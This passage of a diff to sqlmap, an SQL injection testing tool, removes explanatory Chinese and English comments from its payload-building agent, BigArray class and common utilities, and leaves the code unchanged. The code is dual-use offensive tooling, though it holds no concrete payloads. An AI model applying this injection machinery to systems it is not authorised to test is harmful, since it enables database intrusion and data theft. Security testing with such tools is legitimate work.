        elif query.upper().startswith(" UNION ALL "):
            query = re.sub(r"(?i) UNION ALL ", "", query, 1)
-        # If the query starts with "; ", remove it
        elif query.startswith("; "):
            query = query.replace("; ", "", 1)

-        # If the database is Oracle, replace the affected parameter with a null and cast field
        if Backend.getIdentifiedDbms() in (DBMS.ORACLE,):  # non-standard object(s) make problems to a database connector while returned (e.g. XMLTYPE)
            _, _, _, _, _, _, fieldsToCastStr, _ = self.getFields(query)
            for field in fieldsToCastStr.split(','):
                query = query.replace(field, self.nullAndCastField(field))

-        # If tamper functions are defined, apply them to the query
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                query = function(payload=query)
@ -99,53 +92,38 @@ class Agent(object):
        injection statement to request
        """

-        # 如果配置了直接注入，则调用payloadDirect方法
        if conf.direct:
            return self.payloadDirect(newValue)

        retVal = ""

-        # 如果配置了强制where，则使用配置的where
        if kb.forceWhere:
            where = kb.forceWhere
-        # 如果没有配置强制where，且当前技术可用，则使用当前技术的where
        elif where is None and isTechniqueAvailable(getTechnique()):
            where = getTechniqueData().where

-        # 如果kb中注入的place不为空，则使用kb中的place
        if kb.injection.place is not None:
            place = kb.injection.place

-        # 如果kb中注入的parameter不为空，则使用kb中的parameter
        if kb.injection.parameter is not None:
            parameter = kb.injection.parameter

-        # 获取参数字符串和参数字典
        paramString = conf.parameters[place]
        paramDict = conf.paramDict[place]
-        # 获取原始值
        origValue = getUnicode(paramDict[parameter])
-        # 如果有新的值，则转换为unicode
        newValue = getUnicode(newValue) if newValue else newValue
-        # 判断参数是否为base64编码
        base64Encoding = re.sub(r" \(.+", "", parameter) in conf.base64Parameter

-        # 如果place为URI或者原始值中包含BOUNDED_INJECTION_MARKER，则处理URI
        if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
            paramString = origValue
-            # 如果place为URI，则获取URI中的参数
            if place == PLACE.URI:
                origValue = origValue.split(kb.customInjectionMark)[0]
-            # 否则，获取原始值中的参数
            else:
                origValue = filterNone(re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z"))[0].group(0)
-            # 获取参数名
            origValue = origValue[origValue.rfind('/') + 1:]
-            # 去除参数名中的特殊字符
            for char in ('?', '=', ':', ',', '&'):
                if char in origValue:
                    origValue = origValue[origValue.rfind(char) + 1:]
-        # 如果place为CUSTOM_POST，则处理POST
        elif place == PLACE.CUSTOM_POST:
            paramString = origValue
            origValue = origValue.split(kb.customInjectionMark)[0]
--- a/src/sqlmap-master/lib/core/bigarray.py
+++ b/src/sqlmap-master/lib/core/bigarray.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 尝试导入cPickle模块，如果失败则导入pickle模块
 try:
    import cPickle as pickle
 except:
@ -17,47 +16,36 @@ import sys
 import tempfile
 import zlib

-# 从lib.core.compat模块中导入xrange函数
 from lib.core.compat import xrange
-# 从lib.core.enums模块中导入MKSTEMP_PREFIX枚举
 from lib.core.enums import MKSTEMP_PREFIX
-# 从lib.core.exception模块中导入SqlmapSystemException异常
 from lib.core.exception import SqlmapSystemException
-# 从lib.core.settings模块中导入BIGARRAY_CHUNK_SIZE和BIGARRAY_COMPRESS_LEVEL常量
 from lib.core.settings import BIGARRAY_CHUNK_SIZE
 from lib.core.settings import BIGARRAY_COMPRESS_LEVEL

-# 尝试获取object()对象的大小，如果失败则默认大小为16字节
 try:
    DEFAULT_SIZE_OF = sys.getsizeof(object())
 except TypeError:
    DEFAULT_SIZE_OF = 16

-# 定义一个函数，用于返回给定实例/对象的总大小（以字节为单位）
 def _size_of(instance):
    """
    Returns total size of a given instance / object (in bytes)
    """

-    # 获取实例/对象的大小
    retval = sys.getsizeof(instance, DEFAULT_SIZE_OF)

-    # 如果实例/对象是字典类型，则递归计算字典中所有元素的大小
    if isinstance(instance, dict):
        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(instance.items()))
-    # 如果实例/对象是可迭代类型，则递归计算可迭代对象中所有元素的大小
    elif hasattr(instance, "__iter__"):
        retval += sum(_size_of(_) for _ in instance if _ != instance)

    return retval

-# 定义一个辅助类，用于存储缓存块
 class Cache(object):
    """
    Auxiliary class used for storing cached chunks
    """

-    # 初始化函数，接收三个参数：索引、数据和脏标记
    def __init__(self, index, data, dirty):
        self.index = index
        self.data = data
@ -106,11 +94,9 @@ class BigArray(list):

        return self

-    # 添加元素到BigArray中
    def append(self, value):
        self.chunks[-1].append(value)

-        # 如果当前chunk的大小超过了设定的chunk大小，则将当前chunk写入临时文件，并创建一个新的chunk
        if self.chunk_length == sys.maxsize:
            self._size_counter += _size_of(value)
            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
@ -122,12 +108,10 @@ class BigArray(list):
            self.chunks[-1] = filename
            self.chunks.append([])

-    # 扩展BigArray
    def extend(self, value):
        for _ in value:
            self.append(_)

-    # 从BigArray中弹出元素
    def pop(self):
        if len(self.chunks[-1]) < 1:
            self.chunks.pop()
@ -141,7 +125,6 @@ class BigArray(list):

        return self.chunks[-1].pop()

-    # 在BigArray中查找元素
    def index(self, value):
        for index in xrange(len(self)):
            if self[index] == value:
@ -149,7 +132,6 @@ class BigArray(list):

        return ValueError, "%s is not in list" % value

-    # 将chunk写入临时文件
    def _dump(self, chunk):
        try:
            handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
@ -166,7 +148,6 @@ class BigArray(list):
            errMsg += "writeable by the current user"
            raise SqlmapSystemException(errMsg)

-    # 检查缓存
    def _checkcache(self, index):
        if (self.cache and self.cache.index != index and self.cache.dirty):
            filename = self._dump(self.cache.data)
@ -181,16 +162,13 @@ class BigArray(list):
                errMsg += "from a temporary file ('%s')" % ex
                raise SqlmapSystemException(errMsg)

-    # 将BigArray序列化
    def __getstate__(self):
        return self.chunks, self.filenames

-    # 将BigArray反序列化
    def __setstate__(self, state):
        self.__init__()
        self.chunks, self.filenames = state

-    # 获取BigArray中指定索引的元素
    def __getitem__(self, y):
        while y < 0:
            y += len(self)
@ -205,7 +183,6 @@ class BigArray(list):
            self._checkcache(index)
            return self.cache.data[offset]

-    # 设置BigArray中指定索引的元素
    def __setitem__(self, y, value):
        index = y // self.chunk_length
        offset = y % self.chunk_length
@ -218,11 +195,9 @@ class BigArray(list):
            self.cache.data[offset] = value
            self.cache.dirty = True

-    # 返回BigArray的字符串表示
    def __repr__(self):
        return "%s%s" % ("..." if len(self.chunks) > 1 else "", self.chunks[-1].__repr__())

-    # 返回BigArray的迭代器
    def __iter__(self):
        for i in xrange(len(self)):
            try:
@ -230,6 +205,5 @@ class BigArray(list):
            except IndexError:
                break

-    # 返回BigArray的长度
    def __len__(self):
        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
--- a/src/sqlmap-master/lib/core/common.py
+++ b/src/sqlmap-master/lib/core/common.py
@ -270,20 +270,15 @@ class Format(object):
        @rtype: C{str}
        """

-        # Initialize the htmlParsed variable to None
        htmlParsed = None

-        # If the knowledge base htmlFp list is empty or the heuristic test is not positive, do nothing
        if len(kb.htmlFp) == 0 or kb.heuristicTest != HEURISTIC_TEST.POSITIVE:
            pass
-        # If the knowledge base htmlFp list has only one element, set htmlParsed to that element
        elif len(kb.htmlFp) == 1:
            htmlParsed = kb.htmlFp[0]
-        # If the knowledge base htmlFp list has more than one element, set htmlParsed to a string of all elements joined by " or "
        elif len(kb.htmlFp) > 1:
            htmlParsed = " or ".join(kb.htmlFp)

-        # Return the htmlParsed variable
        return htmlParsed

    @staticmethod
@ -390,42 +385,34 @@ class Backend(object):

    @staticmethod
    def setVersion(version):
-        # 如果version是字符串类型，则将kb.dbmsVersion设置为version
        if isinstance(version, six.string_types):
            kb.dbmsVersion = [version]

-        # 返回kb.dbmsVersion
        return kb.dbmsVersion

    @staticmethod
    def setVersionList(versionsList):
-        # 如果versionsList是列表类型，则将kb.dbmsVersion设置为versionsList
        if isinstance(versionsList, list):
            kb.dbmsVersion = versionsList
-        # 如果versionsList是字符串类型，则调用Backend.setVersion方法
        elif isinstance(versionsList, six.string_types):
            Backend.setVersion(versionsList)
-        # 否则，记录错误信息
        else:
            logger.error("invalid format of versionsList")

    @staticmethod
    def forceDbms(dbms, sticky=False):
-        # 如果kb.stickyDBMS为False，则将kb.forcedDbms设置为aliasToDbmsEnum(dbms)，并将kb.stickyDBMS设置为sticky
        if not kb.stickyDBMS:
            kb.forcedDbms = aliasToDbmsEnum(dbms)
            kb.stickyDBMS = sticky

    @staticmethod
    def flushForcedDbms(force=False):
-        # 如果kb.stickyDBMS为False或者force为True，则将kb.forcedDbms设置为None，并将kb.stickyDBMS设置为False
        if not kb.stickyDBMS or force:
            kb.forcedDbms = None
            kb.stickyDBMS = False

    @staticmethod
    def setOs(os):
-        # 如果os为None，则返回None
        if os is None:
            return None

@ -523,36 +510,26 @@ class Backend(object):

        dbms = None

-        # 如果kb为空，则不执行任何操作
        if not kb:
            pass
-        # 如果kb中没有testMode，并且dbmsHandler存在，并且dbmsHandler._dbms存在，则将dbms赋值为dbmsHandler._dbms
        elif not kb.get("testMode") and conf.get("dbmsHandler") and getattr(conf.dbmsHandler, "_dbms", None):
            dbms = conf.dbmsHandler._dbms
-        # 如果Backend.getForcedDbms()不为空，则将dbms赋值为Backend.getForcedDbms()
        elif Backend.getForcedDbms() is not None:
            dbms = Backend.getForcedDbms()
-        # 如果Backend.getDbms()不为空，则将dbms赋值为Backend.getDbms()
        elif Backend.getDbms() is not None:
            dbms = Backend.getDbms()
-        # 如果kb中有injection，并且kb.injection.dbms存在，则将dbms赋值为kb.injection.dbms
        elif kb.get("injection") and kb.injection.dbms:
            dbms = unArrayizeValue(kb.injection.dbms)
-        # 如果Backend.getErrorParsedDBMSes()存在，则将dbms赋值为Backend.getErrorParsedDBMSes()
        elif Backend.getErrorParsedDBMSes():
            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
-        # 如果conf中有dbms，则将dbms赋值为conf.get("dbms")
        elif conf.get("dbms"):
            dbms = conf.get("dbms")

-        # 将dbms转换为dbmsEnum类型并返回
        return aliasToDbmsEnum(dbms)

    @staticmethod
    def getVersion():
-        # 如果kb.dbmsVersion不是字符串类型，则将kb.dbmsVersion展开并过滤掉None值，否则将kb.dbmsVersion赋值给versions
        versions = filterNone(flattenValue(kb.dbmsVersion)) if not isinstance(kb.dbmsVersion, six.string_types) else [kb.dbmsVersion]
-        # 如果versions不为空，则返回versions的第一个元素，否则返回None
        if not isNoneValue(versions):
            return versions[0]
        else:
@ -560,9 +537,7 @@ class Backend(object):

    @staticmethod
    def getVersionList():
-        # 如果kb.dbmsVersion不是字符串类型，则将kb.dbmsVersion展开并过滤掉None值，否则将kb.dbmsVersion赋值给versions
        versions = filterNone(flattenValue(kb.dbmsVersion)) if not isinstance(kb.dbmsVersion, six.string_types) else [kb.dbmsVersion]
-        # 如果versions不为空，则返回versions，否则返回None
        if not isNoneValue(versions):
            return versions
        else:
@ -643,48 +618,35 @@ def paramToDict(place, parameters=None):

    testableParameters = OrderedDict()

-    # 如果place在conf.parameters中，并且parameters为空，则将parameters设置为conf.parameters[place]
    if place in conf.parameters and not parameters:
        parameters = conf.parameters[place]

-    # 将parameters中的&替换为PARAMETER_AMP_MARKER，;替换为PARAMETER_SEMICOLON_MARKER
    parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
-    # 根据place的值，将parameters按照不同的分隔符进行分割
    if place == PLACE.COOKIE:
        splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
    else:
        splitParams = parameters.split(conf.paramDel or DEFAULT_GET_POST_DELIMITER)

-    # 遍历分割后的参数
    for element in splitParams:
-        # 将PARAMETER_AMP_MARKER和PARAMETER_SEMICOLON_MARKER替换为&和;
        element = re.sub(r"%s(.+?)%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), r"&\g<1>;", element)
-        # 将参数按照=进行分割
        parts = element.split("=")

-        # 如果分割后的参数长度大于等于2
        if len(parts) >= 2:
-            # 对参数进行url解码
            parameter = urldecode(parts[0].replace(" ", ""))

-            # 如果参数为空，则跳过
            if not parameter:
                continue

-            # 如果conf.paramDel为\n，则去掉参数的最后一个字符
            if conf.paramDel and conf.paramDel == '\n':
                parts[-1] = parts[-1].rstrip()

-            # 判断参数是否在conf.testParameter中，或者参数是否在conf.testParameter中，或者参数是否在PLACE.COOKIE中
            condition = not conf.testParameter
            condition |= conf.testParameter is not None and parameter in conf.testParameter
            condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0

-            # 如果满足条件，则将参数和值添加到testableParameters中
            if condition:
                value = "=".join(parts[1:])

-                # 如果参数在conf.base64Parameter中，则进行base64解码
                if parameter in (conf.base64Parameter or []):
                    try:
                        kb.base64Originals[parameter] = oldValue = value
@ -698,10 +660,8 @@ def paramToDict(place, parameters=None):

                testableParameters[parameter] = value

-                # 如果没有设置conf.multipleTargets，并且参数不是conf.csrfToken，则进行警告
                if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)):
                    _ = urldecode(testableParameters[parameter], convall=True)
-                    # 如果参数值以'结尾，并且'的数量为1，或者参数值以9开头，或者参数值以-开头，或者参数值匹配DUMMY_USER_INJECTION，并且参数不是GOOGLE_ANALYTICS_COOKIE_PREFIX，则进行警告
                    if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
                        warnMsg = "it appears that you have provided tainted parameter values "
                        warnMsg += "('%s') with most likely leftover " % element
@ -712,17 +672,14 @@ def paramToDict(place, parameters=None):

                        message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "

-                        # 如果用户输入的不是y，则抛出SqlmapSilentQuitException异常
                        if not readInput(message, default='N', boolean=True):
                            raise SqlmapSilentQuitException
-                    # 如果参数值为空，则进行警告
                    elif not _:
                        warnMsg = "provided value for parameter '%s' is empty. " % parameter
                        warnMsg += "Please, always use only valid parameter values "
                        warnMsg += "so sqlmap could be able to run properly"
                        logger.warning(warnMsg)

-                # 如果place是PLACE.POST或PLACE.GET，则进行警告
                if place in (PLACE.POST, PLACE.GET):
                    for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"):
                        match = re.search(regex, testableParameters[parameter])
@ -730,19 +687,15 @@ def paramToDict(place, parameters=None):
                            try:
                                candidates = OrderedDict()

-                                # 遍历参数值
                                def walk(head, current=None):
                                    if current is None:
                                        current = head
-                                    # 如果current是列表，则遍历列表
                                    if isListLike(current):
                                        for _ in current:
                                            walk(head, _)
-                                    # 如果current是字典，则遍历字典
                                    elif isinstance(current, dict):
                                        for key in current.keys():
                                            value = current[key]
-                                            # 如果value是bool、int、float、six.string_types，或者value是None、[]，则进行替换
                                            if isinstance(value, (bool, int, float, six.string_types)) or value in (None, []):
                                                original = current[key]
                                                if isinstance(value, bool):
@ -755,7 +708,6 @@ def paramToDict(place, parameters=None):
                                                    current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER)
                                                candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized, separators=(',', ':') if ", " not in testableParameters[parameter] else None), parameters)
                                                current[key] = original
-                                            # 如果value是列表、元组、集合、字典，则进行递归
                                            elif isinstance(value, (list, tuple, set, dict)):
                                                if value:
                                                    walk(head, value)
@ -784,42 +736,32 @@ def paramToDict(place, parameters=None):
                            except Exception:
                                pass

-                            # 使用正则表达式替换testableParameters[parameter]中的匹配项
                            _ = re.sub(regex, r"\g<1>%s\g<%d>" % (kb.customInjectionMark, len(match.groups())), testableParameters[parameter])
-                            # 构造提示信息
                            message = "it appears that provided value for %sparameter '%s' " % ("%s " % place if place != parameter else "", parameter)
                            message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % getUnicode(_)

-                            # 读取用户输入，如果用户选择注入，则替换testableParameters[parameter]中的匹配项
                            if readInput(message, default='N', boolean=True):
                                testableParameters[parameter] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), (r"\g<1>%s" % re.sub(regex, r"\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter].replace("\\", r"\\"))), parameters)
                            break

-    # 如果配置了测试参数
    if conf.testParameter:
-        # 如果没有可测试的参数
        if not testableParameters:
            paramStr = ", ".join(test for test in conf.testParameter)

-            # 如果测试参数数量大于1
            if len(conf.testParameter) > 1:
                warnMsg = "provided parameters '%s' " % paramStr
                warnMsg += "are not inside the %s" % place
                logger.warning(warnMsg)
            else:
-                # 如果测试参数数量为1
                parameter = conf.testParameter[0]

-                # 如果测试参数不在USER_AGENT_ALIASES、REFERER_ALIASES、HOST_ALIASES中
                if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True):
                    debugMsg = "provided parameter '%s' " % paramStr
                    debugMsg += "is not inside the %s" % place
                    logger.debug(debugMsg)

-        # 如果测试参数数量不等于可测试参数数量
        elif len(conf.testParameter) != len(testableParameters):
            for parameter in conf.testParameter:
-                # 如果测试参数不在可测试参数中
                if parameter not in testableParameters:
                    debugMsg = "provided parameter '%s' " % parameter
                    debugMsg += "is not inside the %s" % place
@ -875,16 +817,13 @@ def getManualDirectories():

    directories = normalizePath(directories)

-    # 如果配置文件中有webRoot，则使用webRoot作为web服务器文档根目录
    if conf.webRoot:
        directories = [conf.webRoot]
        infoMsg = "using '%s' as web server document root" % conf.webRoot
        logger.info(infoMsg)
-    # 如果directories有值，则使用directories作为web服务器文档根目录
    elif directories:
        infoMsg = "retrieved the web server document root: '%s'" % directories
        logger.info(infoMsg)
-    # 如果以上两种情况都不满足，则提示无法自动获取web服务器文档根目录
    else:
        warnMsg = "unable to automatically retrieve the web server "
        warnMsg += "document root"
@ -892,7 +831,6 @@ def getManualDirectories():

        directories = []

-        # 提示用户选择可写目录
        message = "what do you want to use for writable directory?\n"
        message += "[1] common location(s) ('%s') (default)\n" % ", ".join(root for root in defaultDocRoot)
        message += "[2] custom location(s)\n"
@ -1701,64 +1639,48 @@ def parseTargetDirect():

            break

-    # 如果kb.smokeMode为True，则直接返回
    if kb.smokeMode:
        return

-    # 如果details为空，则抛出SqlmapSyntaxException异常
    if not details:
        errMsg = "invalid target details, valid syntax is for instance "
        errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
        errMsg += "or 'access://DATABASE_FILEPATH'"
        raise SqlmapSyntaxException(errMsg)

-    # 遍历DBMS_DICT字典
    for dbmsName, data in DBMS_DICT.items():
-        # 如果dbmsName等于conf.dbms或者conf.dbms.lower()在data[0]中，则执行以下操作
        if dbmsName == conf.dbms or conf.dbms.lower() in data[0]:
            try:
-                # 将conf.dbms设置为dbmsName
                conf.dbms = dbmsName

-                # 如果dbmsName在(DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD)中，则执行以下操作
                if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
-                    # 如果remote为True，则抛出警告信息
                    if remote:
                        warnMsg = "direct connection over the network for "
                        warnMsg += "%s DBMS is not supported" % dbmsName
                        logger.warning(warnMsg)

-                        # 将conf.hostname设置为localhost，conf.port设置为0
                        conf.hostname = "localhost"
                        conf.port = 0
-                # 如果remote为False，则抛出SqlmapSyntaxException异常
                elif not remote:
                    errMsg = "missing remote connection details (e.g. "
                    errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
                    errMsg += "or 'access://DATABASE_FILEPATH')"
                    raise SqlmapSyntaxException(errMsg)

-                # 如果dbmsName在(DBMS.MSSQL, DBMS.SYBASE)中，则执行以下操作
                if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
-                    # 导入_mssql模块
                    __import__("_mssql")
-                    # 导入pymssql模块
                    pymssql = __import__("pymssql")

-                    # 如果pymssql没有__version__属性或者pymssql.__version__小于1.0.2，则抛出SqlmapMissingDependence异常
                    if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2":
                        errMsg = "'%s' third-party library must be " % data[1]
                        errMsg += "version >= 1.0.2 to work properly. "
                        errMsg += "Download from '%s'" % data[2]
                        raise SqlmapMissingDependence(errMsg)

-                # 如果dbmsName等于DBMS.MYSQL，则导入pymysql模块
                elif dbmsName == DBMS.MYSQL:
                    __import__("pymysql")
-                # 如果dbmsName等于DBMS.PGSQL，则导入psycopg2模块
                elif dbmsName == DBMS.PGSQL:
                    __import__("psycopg2")
-                # 如果dbmsName等于DBMS.ORACLE，则导入cx_Oracle模块
                elif dbmsName == DBMS.ORACLE:
                    __import__("cx_Oracle")

@ -2515,29 +2437,21 @@ def getSQLSnippet(dbms, sfile, **variables):
        filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else "%s.sql" % sfile)
        checkFile(filename)

-    # 读取缓存文件内容
    retVal = readCachedFileContent(filename)
-    # 删除注释
    retVal = re.sub(r"#.+", "", retVal)
-    # 将分号替换为"; "
    retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n")

-    # 替换变量
    for _ in variables:
        retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal)

-    # 替换随机字符串
    for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
        retVal = retVal.replace(_, randomStr())

-    # 替换随机整数
    for _ in re.findall(r"%RANDINT\d+%", retVal, re.I):
        retVal = retVal.replace(_, randomInt())

-    # 查找未解析的变量
    variables = re.findall(r"(?<!\bLIKE ')%(\w+)%", retVal, re.I)

-    # 如果有未解析的变量，则提示用户输入替换值
    if variables:
        errMsg = "unresolved variable%s '%s' in SQL file '%s'" % ("s" if len(variables) > 1 else "", ", ".join(variables), sfile)
        logger.error(errMsg)
@ -2560,7 +2474,6 @@ def readCachedFileContent(filename, mode="rb"):
    True
    """

-    # 如果文件不在缓存中，则读取文件内容并缓存
    if filename not in kb.cache.content:
        with kb.locks.cache:
            if filename not in kb.cache.content:
@ -4022,7 +3935,6 @@ def fetchRandomAgent():
    True
    """

-    # 如果kb.userAgents为空，则从文件中加载HTTP User-Agent header值
    if not kb.userAgents:
        debugMsg = "loading random HTTP User-Agent header(s) from "
        debugMsg += "file '%s'" % paths.USER_AGENTS
@ -4035,7 +3947,6 @@ def fetchRandomAgent():
            errMsg += "file '%s'" % paths.USER_AGENTS
            raise SqlmapSystemException(errMsg)

-    # 从kb.userAgents中随机选择一个User-Agent header值并返回
    return random.sample(kb.userAgents, 1)[0]

 def createGithubIssue(errMsg, excMsg):
@ -4043,7 +3954,6 @@ def createGithubIssue(errMsg, excMsg):
    Automatically create a Github issue with unhandled exception information
    """

-    # 从文件中获取已创建的Github issue列表
    try:
        issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
    except:
@ -4051,7 +3961,6 @@ def createGithubIssue(errMsg, excMsg):
    finally:
        issues = set(issues)

-    # 对异常信息进行处理，去除不必要的字符
    _ = re.sub(r"'[^']+'", "''", excMsg)
    _ = re.sub(r"\s+line \d+", "", _)
    _ = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", _)
@ -4059,14 +3968,11 @@ def createGithubIssue(errMsg, excMsg):
    _ = re.sub(r"(Unicode[^:]*Error:).+", r"\g<1>", _)
    _ = re.sub(r"= _", "= ", _)

-    # 计算异常信息的MD5值，并取前8位作为key
    key = hashlib.md5(getBytes(_)).hexdigest()[:8]

-    # 如果key已经在已创建的Github issue列表中，则返回
    if key in issues:
        return

-    # 提示用户是否要自动创建一个新的Github issue
    msg = "\ndo you want to automatically create a new (anonymized) issue "
    msg += "with the unhandled exception information at "
    msg += "the official Github repository? [y/N] "
@ -4075,12 +3981,10 @@ def createGithubIssue(errMsg, excMsg):
    except:
        choice = None

-    # 如果用户选择创建新的Github issue，则进行后续操作
    if choice:
        _excMsg = None
        errMsg = errMsg[errMsg.find("\n"):]

-        # 构造请求，查询是否已存在相同的Github issue
        req = _urllib.request.Request(url="https://api.github.com/search/issues?q=%s" % _urllib.parse.quote("repo:sqlmapproject/sqlmap Unhandled exception (#%s)" % key), headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()})

        try:
@ -4167,11 +4071,9 @@ def listToStrValue(value):
    '1, 2, 3'
    """

-    # 如果value是set、tuple或types.GeneratorType类型，将其转换为list
    if isinstance(value, (set, tuple, types.GeneratorType)):
        value = list(value)

-    # 如果value是list类型，将其转换为字符串，并去掉首尾的方括号
    if isinstance(value, list):
        retVal = value.__str__().lstrip('[').rstrip(']')
    else:
@ -4244,97 +4146,62 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
                    value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
                return value

-            # 将payload中的PAYLOAD_DELIMITER替换为空字符串，并使用urldecode解码，然后使用getUnicode转换为Unicode编码
            payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ""), convall=True))
-            # 使用filterStringValue函数过滤payload中的字符串，并使用encodeStringEscape函数进行编码，然后使用_函数进行转换
            regex = _(filterStringValue(payload, r"[A-Za-z0-9]", encodeStringEscape(REFLECTED_REPLACEMENT_REGEX)))

-            # 如果regex不等于payload
            if regex != payload:
-                # 使用filterNone函数过滤regex中的空字符串，并使用REFLECTED_REPLACEMENT_REGEX进行分割，然后使用all函数检查分割后的字符串是否都在content中
                if all(part.lower() in content.lower() for part in filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]):  # fast optimization check
-                    # 使用REFLECTED_REPLACEMENT_REGEX进行分割
                    parts = regex.split(REFLECTED_REPLACEMENT_REGEX)

                    # Note: naive approach
-                    # 将content中的payload替换为REFLECTED_VALUE_MARKER
                    retVal = content.replace(payload, REFLECTED_VALUE_MARKER)
-                    # 将content中的payload的开头替换为REFLECTED_VALUE_MARKER
                    retVal = retVal.replace(re.sub(r"\A\w+", "", payload), REFLECTED_VALUE_MARKER)

-                    # 如果分割后的字符串长度大于REFLECTED_MAX_REGEX_PARTS
                    if len(parts) > REFLECTED_MAX_REGEX_PARTS:  # preventing CPU hogs
-                        # 使用REFLECTED_REPLACEMENT_REGEX进行分割，并使用join函数进行连接
                        regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS // 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS // 2:])))

-                    # 使用filterNone函数过滤regex中的空字符串，并使用REFLECTED_REPLACEMENT_REGEX进行分割
                    parts = filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))

-                    # 如果regex以REFLECTED_REPLACEMENT_REGEX开头
                    if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
-                        # 使用REFLECTED_BORDER_REGEX和regex[len(REFLECTED_REPLACEMENT_REGEX):]进行连接
                        regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
                    else:
-                        # 使用\b和regex进行连接
                        regex = r"\b%s" % regex

-                    # 如果regex以REFLECTED_REPLACEMENT_REGEX结尾
                    if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
-                        # 使用regex[:-len(REFLECTED_REPLACEMENT_REGEX)]和REFLECTED_BORDER_REGEX进行连接
                        regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
                    else:
-                        # 使用regex和\b进行连接
                        regex = r"%s\b" % regex

-                    # 创建一个列表，用于存储retVal
                    _retVal = [retVal]

-                    # 定义一个函数，用于替换retVal中的regex
                    def _thread(regex):
                        try:
-                            # 使用re.sub函数替换retVal中的regex，并使用REFLECTED_VALUE_MARKER进行替换
                            _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0])

-                            # 如果分割后的字符串长度大于2
                            if len(parts) > 2:
-                                # 使用REFLECTED_REPLACEMENT_REGEX进行分割，并使用join函数进行连接
                                regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
-                                # 使用re.sub函数替换retVal中的regex，并使用REFLECTED_VALUE_MARKER进行替换
                                _retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0])
                        except KeyboardInterrupt:
                            raise
                        except:
                            pass

-                    # 创建一个线程，用于执行_thread函数
                    thread = threading.Thread(target=_thread, args=(regex,))
-                    # 设置线程为守护线程
                    thread.daemon = True
-                    # 启动线程
                    thread.start()
-                    # 等待线程执行完毕，超时时间为REFLECTED_REPLACEMENT_TIMEOUT
                    thread.join(REFLECTED_REPLACEMENT_TIMEOUT)

-                    # 如果线程还在运行
                    if thread.is_alive():
-                        # 将kb.reflectiveMechanism设置为False
                        kb.reflectiveMechanism = False
-                        # 将retVal设置为content
                        retVal = content
-                        # 如果不抑制警告
                        if not suppressWarning:
-                            # 打印debugMsg
                            debugMsg = "turning off reflection removal mechanism (because of timeouts)"
                            logger.debug(debugMsg)
                    else:
-                        # 将retVal设置为_retVal[0]
                        retVal = _retVal[0]

-                # 如果retVal不等于content
                if retVal != content:
